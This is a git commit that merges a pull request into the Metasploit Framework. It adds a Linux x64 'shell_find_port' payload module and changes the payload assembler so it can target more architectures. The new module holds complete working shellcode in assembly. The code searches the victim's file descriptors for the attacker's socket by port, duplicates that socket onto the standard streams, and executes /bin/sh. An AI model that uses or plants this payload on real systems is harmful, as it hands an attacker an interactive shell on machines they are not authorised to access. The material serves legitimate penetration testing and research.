Merge pull request #238 from mak/linux-x64-find-port

linux/x64/shell_find_port payload
2012-03-29 05:54:54 -07:00 · 2012-03-29 05:54:54 -07:00 · bd4819e8f2
parent 220ad7875f 0389e47dfe
commit bd4819e8f2
2 changed files with 95 additions and 2 deletions
--- a/lib/msf/core/payload.rb
+++ b/lib/msf/core/payload.rb
@ -528,11 +528,17 @@ protected
 		end

 		# Assemble the payload from the assembly
-		sc = Metasm::Shellcode.assemble(Metasm::Ia32.new, asm).encoded
+                cpu = case module_info['Arch']
+                       when ARCH_X86    then Metasm::Ia32.new
+                       when ARCH_X86_64 then Metasm::X86_64.new
+                       when ARCH_PPC    then Metasm::PowerPC.new
+                       when ARCH_ARMLE  then Metasm::ARM.new
+                      end
+		sc = Metasm::Shellcode.assemble(cpu, asm).encoded

 		# Calculate the actual offsets now that it's been built
 		off.each_pair { |option, val|
-			off[option] = [ sc.offset_of_reloc(option), val[1] ]
+			off[option] = [ sc.offset_of_reloc(option) || val[0], val[1] ]
 		}

 		# Cache the payload blob
--- a/modules/payloads/singles/linux/x64/shell_find_port.rb
+++ b/modules/payloads/singles/linux/x64/shell_find_port.rb
@ -0,0 +1,87 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+require 'msf/core/handler/find_port'
+require 'msf/base/sessions/command_shell'
+require 'msf/base/sessions/command_shell_options'
+
+module Metasploit3
+
+	include Msf::Payload::Single
+	include Msf::Payload::Linux
+	include Msf::Sessions::CommandShellOptions
+
+	def initialize(info = {})
+		super(merge_info(info,
+			'Name'          => 'Linux Command Shell, Find Port Inline',
+			'Version'       => '$Revision$',
+			'Description'   => 'Spawn a shell on an established connection',
+			'Author'        => 'mak',
+			'License'       => MSF_LICENSE,
+			'Platform'      => 'linux',
+			'Arch'          => ARCH_X86_64,
+			'Handler'       => Msf::Handler::FindPort,
+			'Session'       => Msf::Sessions::CommandShellUnix,
+			'Payload'       =>
+				{
+					'Offsets' =>
+						{
+							'CPORT' => [ 32, 'n' ],
+						},
+
+                                        'Assembly' => <<EOS
+       xor rdi,rdi
+       xor rbx,rbx
+       mov bl,0x14
+       sub rsp,rbx
+       lea rdx,[rsp]
+       lea rsi,[rsp+4]
+find_port:
+       push 0x34     ; getpeername
+       pop rax
+       syscall
+       inc rdi
+       cmp word [rsi+2],0x4142
+       jne find_port
+       dec rdi
+       push 2
+       pop rsi
+dup2:
+       push 0x21     ; dup2
+       pop rax
+       syscall
+       dec rsi
+       jns dup2
+       mov rbx,rsi
+       mov ebx, 0x68732f41
+       mov eax,0x6e69622f
+       shr rbx,8
+       shl rbx,32
+       or  rax,rbx
+       push rax
+       mov rdi,rsp
+       xor rsi,rsi
+       mov rdx,rsi
+       push 0x3b     ; execve
+       pop rax
+       syscall
+EOS
+				}
+			))
+	end
+
+        def size
+           return 91
+        end
+
+
+end